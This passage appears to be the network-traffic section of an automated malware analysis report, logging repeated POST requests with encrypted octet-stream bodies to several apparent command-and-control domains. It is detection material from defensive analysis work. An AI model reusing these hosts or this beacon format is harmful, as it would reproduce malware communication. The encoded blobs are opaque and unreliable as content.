79 4e 58 30 48 59 65 53 70 32 32 36 61 4c 2f 67 67 77 61 44 62 70 65 32 59 62 35 75 56 50 4b 72 55 79 2f 57 4d 34 67 41 59 56 6e 67 73 49 76 43 34 77 4a 67 58 78 46 41 69 75 34 51 39 4d 55 55 54 51 7a 56 77 6a 6e 31 48 4f 61 6b 4c 63 37 35 72 56 6a 72 4c 48 6f 2f 6d 63 54 6f 35 6c 68 6d 5a 30 79 78 77 53 62 44 57 55 6b 62 75 42 6e 42 4b 56 62 2b 38 67 57 6a 32 34 65 39 74 6f 44 61 48 42 58 34 78 4e 68 46 2b 52 33 74 54 54 55 59 53 32 55 4d 71 6b 48 4a 66 67 2b 56 44 71 69 35 55 45 41 6a 55 4a 4a 69 74 6d 73 2f 35 66 76 39 39 59 76 5a 36 61 42 63 75 4b 59 54 6f 75 59 47 70 59 54 7a 66 68 6b 45 4b 6f 43 63 4f 74 45 59 63 78 6c 2b 36 56 65 51 3d 3d Data Ascii: U/IiWE+2ZQ4uTXZg7q/zS1jlQVDlQKYp83ptjC6YwGKXmMB1pJplxHnRtSgWwzP1NJQQcXHXBSVSsuHViCLito2w3oHaYPDld8pHp6x61kKqeb00m5BQkoho4ty8iqwiyF4q0+b4tWZ3gO/t6qPkTVQXxPqjFef55/9KVe7nVP4XYpweBYTMfGLwtjHz4IPY4mb+6olelCrZyIsKwE/3B2uUzT26rizPYEfPVSFg9lJ6gzspI+6kxVC5L1J6e++Y1n00k9A18zz/mXsrbgiDXtAoSkq1M1RoKH49c6rHgrxizGmAvm9NUz+KepZM11t1Bpmb4hovbNkh0tKjNhNmCfyNX0HYeSp226aL/ggwaDbpe2Yb5uVPKrUy/WM4gAYVngsIvC4wJgXxFAiu4Q9MUUTQzVwjn1HOakLc75rVjrLHo/mcTo5lhmZ0yxwSbDWUkbuBnBKVb+8gWj24e9toDaHBX4xNhF+R3tTTUYS2UMqkHJfg+VDqi5UEAjUJJitms/5fv99YvZ6aBcuKYTouYGpYTzfhkEKoCcOtEYcxl+6VeQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 55 5a 38 4a 45 6b 77 66 57 77 34 66 62 38 7a 65 74 39 4c 7a 55 31 38 67 56 79 30 6b 54 72 75 63 51 41 57 2f 66 4a 6e 51 7a 4c 58 53 49 66 57 44 61 33 5a 50 53 48 67 38 78 76 4c 32 74 69 73 73 41 58 2f 49 58 63 42 45 71 34 4e 65 52 38 49 62 36 58 6e 61 4b 6a 48 72 56 59 33 44 30 69 2b 6b 6a 65 59 53 37 2b 50 43 4f 72 67 54 62 51 53 73 6b 44 4b 4d 38 73 6a 43 72 6c 54 31 50 4b 36 47 43 4d 44 63 34 75 59 35 65 4d 5a 75 79 78 63 54 38 4f 78 72 6d 52 62 32 7a 54 58 58 67 4e 5a 54 53 4c 57 38 4a 70 46 6f 31 4c 74 34 74 4c 57 4b 77 77 66 76 43 70 43 6d 38 79 52 52 38 72 51 35 63 63 43 41 61 52 2f 74 67 6e 4a 33 6a 52 67 64 4c 78 54 4e 63 62 54 41 4b 67 4d 52 53 4f 39 73 77 39 77 72 4d 48 7a 58 5a 36 43 63 50 51 47 6e 4b 66 73 61 53 71 4f 6d 66 75 59 61 74 46 59 50 50 55 51 48 77 58 6a 5a 61 6d 2f 63 74 39 2f 42 54 47 73 4c 4b 41 6d 56 79 63 7a 48 78 63 6c 47 34 55 4f 37 45 44 6f 49 43 2b 71 68 39 47 64 46 2b 67 36 30 47 77 54 50 46 6b 7a 34 61 35 69 36 38 74 38 72 2b 51 75 71 65 68 67 62 34 33 44 61 6a 36 49 43 37 34 6d 67 65 4f 4c 55 53 77 75 78 2f 48 54 4a 35 78 51 33 54 7a 32 54 4b 4b 64 30 41 55 59 55 2b 56 58 37 62 33 43 4c 51 6f 46 2f 39 69 38 6f 71 76 56 47 66 4d 76 5a 57 52 67 50 36 41 76 6b 72 68 4c 75 69 48 36 59 6e 6c 6d 42 74 34 30 6f 33 32 76 39 78 71 44 32 75 55 43 61 72 5a 47 4c 34 61 33 70 35 69 75 71 38 37 57 6d 77 4a 30 4b 57 6e 70 51 51 53 62 6e 52 63 49 69 4d 4b 4e 66 6e 43 6b 4e 62 75 7a 63 4a 7a 48 37 2b 66 49 75 6c 6d 4c 47 44 56 44 74 68 4e 41 61 74 66 35 57 6e 58 34 74 64 53 64 76 45 69 65 6f 78 52 7a 6e 5a 52 70 72 6b 30 35 74 6d 31 5a 72 59 36 6d 72 32 67 31 53 31 58 52 55 6d 6b 49 42 63 66 44 6f 7a 6e 6e 45 74 75 47 2f 50 56 39 57 2b 35 49 71 41 70 78 77 41 50 6d 57 75 64 32 32 Data Ascii: UZ8JEkwfWw4fb8zet9LzU18gVy0kTrucQAW/fJnQzLXSIfWDa3ZPSHg8xvL2tissAX/IXcBEq4NeR8Ib6XnaKjHrVY3D0i+kjeYS7+PCOrgTbQSskDKM8sjCrlT1PK6GCMDc4uY5eMZuyxcT8OxrmRb2zTXXgNZTSLW8JpFo1Lt4tLWKwwfvCpCm8yRR8rQ5ccCAaR/tgnJ3jRgdLxTNcbTAKgMRSO9sw9wrMHzXZ6CcPQGnKfsaSqOmfuYatFYPPUQHwXjZam/ct9/BTGsLKAmVyczHxclG4UO7EDoIC+qh9GdF+g60GwTPFkz4a5i68t8r+Quqehgb43Daj6IC74mgeOLUSwux/HTJ5xQ3Tz2TKKd0AUYU+VX7b3CLQoF/9i8oqvVGfMvZWRgP6AvkrhLuiH6YnlmBt40o32v9xqD2uUCarZGL4a3p5iuq87WmwJ0KWnpQQSbnRcIiMKNfnCkNbuzcJzH7+fIulmLGDVDthNAatf5WnX4tdSdvEieoxRznZRprk05tm1ZrY6mr2g1S1XRUmkIBcfDoznnEtuG/PV9W+5IqApxwAPmWud22
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 51 41 67 6d 69 50 75 6b 56 67 36 56 4f 4c 68 4a 6b 6c 59 55 6d 65 52 45 74 59 55 42 6f 7a 38 74 58 2b 61 4f 78 6b 45 52 70 47 44 39 57 46 51 36 71 43 35 62 69 41 6c 61 48 73 32 63 6b 36 6e 62 53 36 35 2b 50 44 50 31 2f 6f 70 53 52 43 61 69 74 63 65 53 30 34 48 55 61 78 69 53 6b 64 6f 77 57 67 4c 6e 58 70 79 6d 50 31 78 6b 4d 47 61 4d 6f 6c 5a 51 6b 65 53 6d 2f 79 72 6e 69 50 6c 68 55 68 68 62 65 4d 6b 61 6d 62 50 67 58 79 66 73 53 42 78 77 30 72 58 71 70 4c 39 78 47 4a 75 74 36 51 58 54 46 7a 74 37 58 4a 4d 4d 49 56 51 53 69 66 55 63 30 6f 56 61 5a 57 58 61 51 2f 34 72 2b 72 6a 39 36 79 74 47 7a 42 6e 76 58 59 31 50 76 62 33 2f 6d 47 6a 59 35 76 49 57 59 37 33 53 39 7a 57 55 67 78 68 72 6e 76 46 50 62 56 79 77 46 34 77 41 69 64 36 74 37 41 48 45 66 72 52 54 4a 69 68 49 4d 72 68 2f 52 53 4e 55 50 6b 58 6e 5a 71 49 41 76 47 53 59 7a 44 6d 61 73 65 49 42 71 69 4c 4f 4c 33 49 5a 78 78 56 38 71 49 65 77 72 42 6b 33 58 70 74 4a 45 7a 42 56 4c 77 64 5a 68 67 79 39 4f 44 6f 4d 53 6a 47 4a 56 34 2b 38 79 55 55 73 51 76 59 36 4d 62 39 62 52 44 4a 33 7a 4a 62 70 79 68 37 37 74 4d 4f 65 75 6f 42 4b 57 67 43 36 53 77 6c 49 79 53 39 57 72 4d 69 61 63 50 64 44 44 34 55 59 45 4b 41 55 2f 68 4c 4d 57 45 36 57 58 6d 2b 39 70 77 66 44 58 61 6a 52 6e 76 6a 6c 37 5a 73 50 59 6b 31 6c 54 38 67 53 48 6c 77 79 4e 45 42 64 41 32 34 35 33 35 44 53 75 6f 41 4a 7a 38 61 42 30 37 61 31 66 41 68 63 70 73 4a 6b 62 6b 62 43 2b 4b 56 2f 49 69 78 33 6b 6b 58 6f 49 76 4e 76 5a 66 4d 65 50 58 57 74 61 57 74 2f 34 55 6a 50 4c 56 55 4e 47 76 74 4d 5a 59 31 68 6d 6d 71 67 2b 79 74 75 72 59 50 34 6b 57 30 4b 56 4e 63 4a 72 4c 6b 78 5a 53 32 36 53 51 43 39 62 6a 4c 30 58 58 38 3d Data Ascii: QAgmiPukVg6VOLhJklYUmeREtYUBoz8tX+aOxkERpGD9WFQ6qC5biAlaHs2ck6nbS65+PDP1/opSRCaitceS04HUaxiSkdowWgLnXpymP1xkMGaMolZQkeSm/yrniPlhUhhbeMkambPgXyfsSBxw0rXqpL9xGJut6QXTFzt7XJMMIVQSifUc0oVaZWXaQ/4r+rj96ytGzBnvXY1Pvb3/mGjY5vIWY73S9zWUgxhrnvFPbVywF4wAid6t7AHEfrRTJihIMrh/RSNUPkXnZqIAvGSYzDmaseIBqiLOL3IZxxV8qIewrBk3XptJEzBVLwdZhgy9ODoMSjGJV4+8yUUsQvY6Mb9bRDJ3zJbpyh77tMOeuoBKWgC6SwlIyS9WrMiacPdDD4UYEKAU/hLMWE6WXm+9pwfDXajRnvjl7ZsPYk1lT8gSHlwyNEBdA24535DSuoAJz8aB07a1fAhcpsJkbkbC+KV/Iix3kkXoIvNvZfMePXWtaWt/4UjPLVUNGvtMZY1hmmqg+yturYP4kW0KVNcJrLkxZS26SQC9bjL0XX8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 6a 66 47 45 6a 30 50 69 56 67 35 67 6b 46 76 6d 53 69 4b 4b 72 57 79 5a 6f 33 76 70 4c 56 44 68 4a 31 51 45 66 52 67 43 68 31 77 78 73 2b 6d 4b 77 72 2f 51 4c 47 53 68 43 51 69 44 49 4e 52 50 35 5a 59 4c 2b 6e 4c 58 6f 64 30 51 4d 48 53 6f 73 30 55 77 76 6e 44 65 6f 4e 4d 33 31 6e 62 36 33 4f 69 56 66 31 6d 69 35 7a 4a 51 78 37 45 7a 6c 42 43 68 77 37 4c 34 34 2f 72 4e 58 58 69 62 51 4d 32 43 4d 66 6f 6f 70 62 79 78 44 47 6f 4f 39 75 35 77 6a 42 78 58 4a 45 33 79 73 63 63 49 31 68 39 42 56 78 38 5a 52 6e 32 6d 64 65 70 76 70 67 6c 30 64 76 2b 76 44 64 46 65 61 48 52 42 67 56 37 43 73 71 4d 4c 75 33 63 31 66 77 59 72 59 6c 76 34 37 6b 38 6c 37 51 77 52 6d 44 53 2f 77 46 51 55 57 62 52 70 41 67 36 57 43 6c 37 75 4b 49 57 46 6f 58 39 59 36 6d 62 48 4f 67 4f 32 67 2b 77 54 59 41 6d 72 68 66 56 75 34 36 31 57 52 58 6c 5a 6b 50 6c 52 7a 61 33 77 34 46 4e 7a 47 59 64 39 74 55 44 5a 38 52 48 69 75 37 4a 6d 61 5a 50 31 2b 4b 35 37 72 51 6c 61 4b 62 64 62 43 2f 52 4e 66 54 50 35 69 69 70 7a 64 78 48 71 68 69 44 52 62 31 52 79 6e 53 7a 35 66 6c 33 32 7a 70 65 51 66 32 35 4a 57 32 63 4f 72 6f 4a 73 78 63 43 73 4d 4e 6f 78 4b 47 6f 66 76 7a 41 33 46 37 6a 34 39 2b 39 66 33 30 2b 4d 4b 52 35 53 38 51 37 57 32 31 5a 73 58 39 48 74 4a 59 59 57 30 67 2b 68 71 39 4a 43 57 76 6b 58 4a 2f 53 35 6f 36 46 6c 56 78 53 6f 67 32 36 6d 70 54 4a 43 30 54 64 49 51 59 61 30 42 38 38 62 68 61 48 67 42 35 4e 35 56 54 56 58 4d 44 42 36 4a 55 51 5a 6d 38 67 6e 2b 48 70 4b 33 41 58 33 70 2f 32 6d 57 38 31 64 45 48 63 34 59 59 65 61 2b 6b 72 79 48 6d 6c 72 4a 38 64 37 74 6a 79 70 66 64 50 4d 54 70 62 78 61 38 67 78 59 64 79 55 4b 35 6e 4d 31 43 65 61 63 43 6e 52 69 55 69 6d 42 53 34 55 68 72 73 73 76 6f 63 76 59 37 72 74 70 63 56 38 31 68 65 78 46 58 38 34 4e 51 3d 3d Data Ascii: jfGEj0PiVg5gkFvmSiKKrWyZo3vpLVDhJ1QEfRgCh1wxs+mKwr/QLGShCQiDINRP5ZYL+nLXod0QMHSos0UwvnDeoNM31nb63OiVf1mi5zJQx7EzlBChw7L44/rNXXibQM2CMfoopbyxDGoO9u5wjBxXJE3ysccI1h9BVx8ZRn2mdepvpgl0dv+vDdFeaHRBgV7CsqMLu3c1fwYrYlv47k8l7QwRmDS/wFQUWbRpAg6WCl7uKIWFoX9Y6mbHOgO2g+wTYAmrhfVu461WRXlZkPlRza3w4FNzGYd9tUDZ8RHiu7JmaZP1+K57rQlaKbdbC/RNfTP5iipzdxHqhiDRb1RynSz5fl32zpeQf25JW2cOroJsxcCsMNoxKGofvzA3F7j49+9f30+MKR5S8Q7W21ZsX9HtJYYW0g+hq9JCWvkXJ/S5o6FlVxSog26mpTJC0TdIQYa0B88bhaHgB5N5VTVXMDB6JUQZm8gn+HpK3AX3p/2mW81dEHc4YYea+kryHmlrJ8d7tjypfdPMTpbxa8gxYdyUK5nM1CeacCnRiUimBS4UhrssvocvY7rtpcV81hexFX84NQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 56 36 5a 2f 73 35 39 64 59 41 34 7a 63 45 5a 68 2f 67 34 6f 67 53 67 5a 57 79 70 31 77 75 4a 57 51 33 63 76 6d 2b 77 33 78 51 6b 2b 75 72 65 36 7a 61 4e 50 70 38 36 4d 66 63 64 4c 51 5a 49 7a 66 55 69 71 46 37 68 45 6a 50 48 58 54 71 61 62 37 77 73 6d 58 51 47 6a 4a 5a 61 73 4f 6a 75 61 51 4d 62 34 73 52 74 42 74 6b 59 69 64 4c 5a 6f 34 45 68 30 33 72 33 34 49 38 47 39 59 56 72 73 49 72 4c 69 4f 41 73 55 74 4b 70 65 41 61 6a 46 72 68 39 67 75 54 6d 6b 6f 61 46 70 72 4c 37 2b 69 53 33 59 58 48 43 76 68 78 56 62 47 41 31 37 6f 71 6e 67 32 42 54 6e 6a 51 67 47 77 42 5a 2b 58 6f 64 6e 31 51 51 52 57 39 70 61 70 67 35 63 34 64 39 55 39 75 76 2f 4d 35 38 38 53 62 49 30 41 4e 41 67 78 33 43 68 59 42 62 71 45 58 4c 44 55 4b 72 6a 2b 44 72 33 75 36 70 66 57 4a 37 67 39 4a 70 44 50 48 41 78 4b 71 4c 52 65 4a 73 70 6e 62 75 69 47 35 79 6c 34 41 62 77 56 71 30 6c 39 4a 2b 51 5a 71 2f 51 6a 33 70 50 55 45 77 4a 52 55 44 57 79 31 53 47 53 43 37 70 34 2f 4c 42 55 4e 35 53 41 4e 67 31 74 38 2b 35 59 36 55 76 36 32 61 71 58 43 44 52 72 4e 59 6b 4e 42 52 2f 6d 54 59 51 79 59 42 48 67 53 32 5a 6d 38 62 47 45 77 4b 50 41 46 49 74 58 37 4b 68 32 4e 31 72 74 33 6c 62 4a 72 79 71 6f 4d 54 4c 70 53 37 73 71 69 55 71 49 30 77 41 43 52 6f 79 52 76 53 64 67 62 39 53 57 4b 61 4d 77 64 6a 6f 74 30 63 77 70 2f 53 46 37 41 43 63 72 53 6b 33 34 70 49 76 63 35 73 66 63 43 34 42 4a 35 79 4b 67 50 65 42 38 69 72 78 56 30 2f 37 37 6c 6c 58 70 51 4c 75 55 35 69 44 68 73 38 77 66 71 75 4c 7a 41 34 54 71 6b 79 53 67 59 67 49 65 6a 51 42 41 6b 55 36 35 47 79 59 39 61 59 53 37 65 34 49 44 66 50 34 53 47 6a 6a 69 43 78 58 78 71 61 6e 71 52 56 57 6f 55 6f 71 54 45 2b 70 70 57 79 65 43 72 74 6b 38 39 36 50 41 69 48 74 57 72 5a 70 48 31 63 3d Data Ascii: V6Z/s59dYA4zcEZh/g4ogSgZWyp1wuJWQ3cvm+w3xQk+ure6zaNPp86MfcdLQZIzfUiqF7hEjPHXTqab7wsmXQGjJZasOjuaQMb4sRtBtkYidLZo4Eh03r34I8G9YVrsIrLiOAsUtKpeAajFrh9guTmkoaFprL7+iS3YXHCvhxVbGA17oqng2BTnjQgGwBZ+Xodn1QQRW9papg5c4d9U9uv/M588SbI0ANAgx3ChYBbqEXLDUKrj+Dr3u6pfWJ7g9JpDPHAxKqLReJspnbuiG5yl4AbwVq0l9J+QZq/Qj3pPUEwJRUDWy1SGSC7p4/LBUN5SANg1t8+5Y6Uv62aqXCDRrNYkNBR/mTYQyYBHgS2Zm8bGEwKPAFItX7Kh2N1rt3lbJryqoMTLpS7sqiUqI0wACRoyRvSdgb9SWKaMwdjot0cwp/SF7ACcrSk34pIvc5sfcC4BJ5yKgPeB8irxV0/77llXpQLuU5iDhs8wfquLzA4TqkySgYgIejQBAkU65GyY9aYS7e4IDfP4SGjjiCxXxqanqRVWoUoqTE+ppWyeCrtk896PAiHtWrZpH1c=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 55 2f 49 69 57 45 2b 32 5a 51 34 75 54 58 5a 67 37 71 2f 7a 53 31 6a 6c 51 56 44 6c 51 4b 59 70 38 33 70 74 6a 43 36 59 77 47 4b 58 6d 4d 42 31 70 4a 70 6c 78 48 6e 52 74 53 67 57 77 7a 50 31 4e 4a 51 51 63 58 48 58 42 53 56 53 73 75 48 56 69 43 4c 69 74 6f 32 77 33 6f 48 61 59 50 44 6c 64 38 70 48 70 36 78 36 31 6b 4b 71 65 62 30 30 6d 35 42 51 6b 6f 68 6f 34 74 79 38 69 71 77 69 79 46 34 71 30 2b 62 34 74 57 5a 33 67 4f 2f 74 36 71 50 6b 54 56 51 58 78 50 71 6a 46 65 66 35 35 2f 39 4b 56 65 37 6e 56 50 34 58 59 70 77 65 42 59 54 4d 66 47 4c 77 74 6a 48 7a 34 49 50 59 34 6d 62 2b 36 6f 6c 65 6c 43 72 5a 79 49 73 4b 77 45 2f 33 42 32 75 55 7a 54 32 36 72 69 7a 50 59 45 66 50 56 53 46 67 39 6c 4a 36 67 7a 73 70 49 2b 36 6b 78 56 43 35 4c 31 4a 36 65 2b 2b 59 31 6e 30 30 6b 39 41 31 38 7a 7a 2f 6d 58 73 72 62 67 69 44 58 74 41 6f 53 6b 71 31 4d 31 52 6f 4b 48 34 39 63 36 72 48 67 72 78 69 7a 47 6d 41 76 6d 39 4e 55 7a 2b 4b 65 70 5a 4d 31 31 74 31 42 70 6d 62 34 68 6f 76 62 4e 6b 68 30 74 4b 6a 4e 68 4e 6d 43 66 79 4e 58 30 48 59 65 53 70 32 32 36 61 4c 2f 67 67 77 61 44 62 70 65 32 59 62 35 75 56 50 4b 72 55 79 2f 57 4d 34 67 41 59 56 6e 67 73 49 76 43 34 77 4a 67 58 78 46 41 69 75 34 51 39 4d 55 55 54 51 7a 56 77 6a 6e 31 48 4f 61 6b 4c 63 37 35 72 56 6a 72 4c 48 6f 2f 6d 63 54 6f 35 6c 68 6d 5a 30 79 78 77 53 62 44 57 55 6b 62 75 42 6e 42 4b 56 62 2b 38 67 57 6a 32 34 65 39 74 6f 44 61 48 42 58 34 78 4e 68 46 2b 52 33 74 54 54 55 59 53 32 55 4d 71 6b 48 4a 66 67 2b 56 44 71 69 35 55 45 41 6a 55 4a 4a 69 74 6d 73 2f 35 66 76 39 39 59 76 5a 36 61 42 63 75 4b 59 54 6f 75 59 47 70 59 54 7a 66 68 6b 45 4b 6f 43 63 4f 74 45 59 63 78 6c 2b 36 56 65 51 3d 3d Data Ascii: U/IiWE+2ZQ4uTXZg7q/zS1jlQVDlQKYp83ptjC6YwGKXmMB1pJplxHnRtSgWwzP1NJQQcXHXBSVSsuHViCLito2w3oHaYPDld8pHp6x61kKqeb00m5BQkoho4ty8iqwiyF4q0+b4tWZ3gO/t6qPkTVQXxPqjFef55/9KVe7nVP4XYpweBYTMfGLwtjHz4IPY4mb+6olelCrZyIsKwE/3B2uUzT26rizPYEfPVSFg9lJ6gzspI+6kxVC5L1J6e++Y1n00k9A18zz/mXsrbgiDXtAoSkq1M1RoKH49c6rHgrxizGmAvm9NUz+KepZM11t1Bpmb4hovbNkh0tKjNhNmCfyNX0HYeSp226aL/ggwaDbpe2Yb5uVPKrUy/WM4gAYVngsIvC4wJgXxFAiu4Q9MUUTQzVwjn1HOakLc75rVjrLHo/mcTo5lhmZ0yxwSbDWUkbuBnBKVb+8gWj24e9toDaHBX4xNhF+R3tTTUYS2UMqkHJfg+VDqi5UEAjUJJitms/5fv99YvZ6aBcuKYTouYGpYTzfhkEKoCcOtEYcxl+6VeQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 57 4d 2b 30 6d 76 73 76 63 41 34 44 55 4f 49 5a 6b 6d 58 43 57 75 51 4c 68 69 77 42 32 6f 76 65 58 31 6c 79 6c 49 54 4d 75 65 44 42 71 42 41 72 47 62 50 6e 46 4c 31 74 53 69 72 43 36 6b 55 54 45 67 33 78 66 6c 6f 77 77 46 53 33 34 48 75 59 32 67 54 65 30 70 73 77 4a 6b 49 66 31 59 66 76 6f 44 69 58 62 49 76 32 53 5a 58 48 63 45 39 77 79 33 66 56 4b 47 6c 6b 46 4b 63 4b 36 70 68 4c 58 4c 4c 48 2b 6c 72 36 75 6a 72 76 44 39 6b 42 44 6a 53 63 58 49 77 59 63 46 66 65 61 70 79 50 4e 45 5a 44 62 71 62 4e 41 4e 49 41 6e 44 30 41 62 44 44 76 49 7a 37 56 6a 45 65 78 30 7a 35 38 49 52 4e 63 2f 38 66 55 64 49 38 4e 37 33 56 70 35 30 4d 37 65 54 4e 69 56 31 33 76 71 32 49 35 32 4b 7a 43 30 2b 56 39 79 72 52 35 30 61 61 7a 73 57 6a 32 6d 48 39 2b 6f 42 36 5a 55 4f 46 30 67 2b 4c 72 56 72 2b 48 57 69 65 4b 55 79 73 74 70 45 58 62 43 6c 58 5a 56 6a 56 4f 43 7a 32 59 49 6d 4f 71 43 4f 73 68 33 46 42 64 72 76 50 48 5a 65 2b 4b 42 54 4d 5a 33 5a 34 63 4f 32 35 78 63 7a 78 53 42 4b 50 38 35 41 4e 32 45 50 38 6e 4f 68 73 32 51 69 37 49 4f 62 74 2b 63 67 46 67 41 7a 6d 79 44 33 52 4f 4e 4d 2f 78 78 2f 39 41 74 59 71 63 54 50 6c 33 32 63 77 44 64 34 6a 63 34 4d 4a 6e 39 56 69 43 6f 37 50 46 5a 4d 63 4a 54 52 55 36 76 5a 68 31 31 75 63 41 45 31 73 71 31 65 69 7a 36 53 39 7a 37 4e 42 7a 32 61 48 6b 4e 48 6e 72 50 32 52 79 49 38 41 77 79 66 4d 45 4f 38 73 34 79 34 53 59 2f 6b 4c 77 6d 6f 37 31 54 46 57 57 32 51 74 76 31 72 73 33 73 74 6c 35 32 31 79 45 34 72 6a 4d 4f 35 66 6b 34 61 38 71 36 55 45 79 69 65 78 58 7a 35 54 52 6d 4d 43 65 52 5a 50 46 63 47 57 34 5a 77 36 64 51 34 57 71 50 33 76 73 62 4d 79 55 4e 57 57 4c 39 36 2b 66 56 57 41 57 58 41 55 3d Data Ascii: WM+0mvsvcA4DUOIZkmXCWuQLhiwB2oveX1lylITMueDBqBArGbPnFL1tSirC6kUTEg3xflowwFS34HuY2gTe0pswJkIf1YfvoDiXbIv2SZXHcE9wy3fVKGlkFKcK6phLXLLH+lr6ujrvD9kBDjScXIwYcFfeapyPNEZDbqbNANIAnD0AbDDvIz7VjEex0z58IRNc/8fUdI8N73Vp50M7eTNiV13vq2I52KzC0+V9yrR50aazsWj2mH9+oB6ZUOF0g+LrVr+HWieKUystpEXbClXZVjVOCz2YImOqCOsh3FBdrvPHZe+KBTMZ3Z4cO25xczxSBKP85AN2EP8nOhs2Qi7IObt+cgFgAzmyD3RONM/xx/9AtYqcTPl32cwDd4jc4MJn9ViCo7PFZMcJTRU6vZh11ucAE1sq1eiz6S9z7NBz2aHkNHnrP2RyI8AwyfMEO8s4y4SY/kLwmo71TFWW2Qtv1rs3stl521yE4rjMO5fk4a8q6UEyiexXz5TRmMCeRZPFcGW4Zw6dQ4WqP3vsbMyUNWWL96+fVWAWXAU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 69 68 62 67 57 68 58 4e 5a 51 34 57 7a 6c 34 68 2f 4c 74 64 6a 67 34 61 30 42 30 6a 54 67 30 44 47 63 75 64 57 6c 6a 38 41 39 4d 62 32 6d 4f 66 78 61 45 44 31 62 6d 52 36 4f 53 36 34 51 2b 73 46 6b 4c 66 41 37 50 78 2b 73 50 64 72 77 33 74 69 4e 76 5a 67 6f 52 53 2b 78 43 4e 58 32 4e 4b 63 50 70 4d 31 67 4e 37 43 37 78 76 69 70 6c 63 6b 44 54 6f 52 39 47 4b 76 42 58 45 4c 4f 41 54 64 34 43 49 72 34 64 6a 7a 4a 67 33 44 38 49 61 4e 67 38 62 39 70 4d 35 46 6b 66 74 38 38 67 68 73 4b 47 2f 41 2b 66 67 54 63 2f 6c 37 54 52 4e 49 4f 70 6a 63 72 35 67 52 6d 47 30 38 54 6d 72 42 52 6e 48 55 45 57 58 57 69 30 59 2f 4b 55 6e 2b 78 6e 46 35 44 34 72 34 58 78 49 4a 62 64 53 30 37 52 79 38 4f 55 41 63 6a 4a 69 4e 32 4f 42 54 75 4e 78 4c 62 78 56 54 33 6c 66 49 7a 62 74 35 4b 44 4f 56 2f 67 70 41 61 44 68 7a 47 52 54 4f 43 41 47 35 38 6c 68 63 4f 2f 4a 5a 41 68 33 54 35 66 42 53 55 46 37 33 57 41 4a 79 76 45 49 66 6c 59 63 37 64 55 56 6b 66 73 32 63 30 68 75 34 74 39 4e 6f 6f 30 57 39 70 67 42 66 61 33 43 6e 39 53 4b 35 36 78 64 74 7a 6a 67 46 6b 4d 34 47 66 5a 51 34 77 6a 34 6b 6e 48 42 49 43 75 35 4f 61 65 42 61 2b 42 4d 6f 47 64 4b 2f 66 6a 33 79 30 34 78 50 4e 72 70 6f 61 71 6b 31 78 4f 4a 74 75 52 45 36 6d 6a 42 45 48 66 36 6c 4b 39 61 49 30 66 4b 75 64 72 66 54 4b 74 7a 7a 4f 4e 74 6c 73 62 6c 56 32 5a 73 64 73 39 69 56 41 46 6d 7a 53 38 73 45 34 4f 57 35 68 65 63 6b 68 4b 33 71 6e 37 45 61 63 2f 37 76 6c 76 35 42 74 71 71 76 4d 6e 77 58 78 50 39 54 70 2f 73 6b 44 32 42 6f 2b 6b 75 50 61 79 72 35 50 74 58 54 47 68 36 71 45 65 4a 66 55 6c 49 56 7a 73 63 33 4c 56 59 41 67 63 39 49 51 4d 4c 6b 76 62 6c 74 30 44 73 63 35 2b 69 5a 73 31 45 78 53 46 43 6c 75 70 5a 42 49 57 4e 36 70 6e 74 76 43 51 30 34 38 6c 6b 6b 73 57 53 42 45 30 41 38 57 6b 3d Data Ascii: ihbgWhXNZQ4Wzl4h/Ltdjg4a0B0jTg0DGcudWlj8A9Mb2mOfxaED1bmR6OS64Q+sFkLfA7Px+sPdrw3tiNvZgoRS+xCNX2NKcPpM1gN7C7xviplckDToR9GKvBXELOATd4CIr4djzJg3D8IaNg8b9pM5Fkft88ghsKG/A+fgTc/l7TRNIOpjcr5gRmG08TmrBRnHUEWXWi0Y/KUn+xnF5D4r4XxIJbdS07Ry8OUAcjJiN2OBTuNxLbxVT3lfIzbt5KDOV/gpAaDhzGRTOCAG58lhcO/JZAh3T5fBSUF73WAJyvEIflYc7dUVkfs2c0hu4t9Noo0W9pgBfa3Cn9SK56xdtzjgFkM4GfZQ4wj4knHBICu5OaeBa+BMoGdK/fj3y04xPNrpoaqk1xOJtuRE6mjBEHf6lK9aI0fKudrfTKtzzONtlsblV2Zsds9iVAFmzS8sE4OW5heckhK3qn7Eac/7vlv5BtqqvMnwXxP9Tp/skD2Bo+kuPayr5PtXTGh6qEeJfUlIVzsc3LVYAgc9IQMLkvblt0Dsc5+iZs1ExSFClupZBIWN6pntvCQ048lkksWSBE0A8Wk=
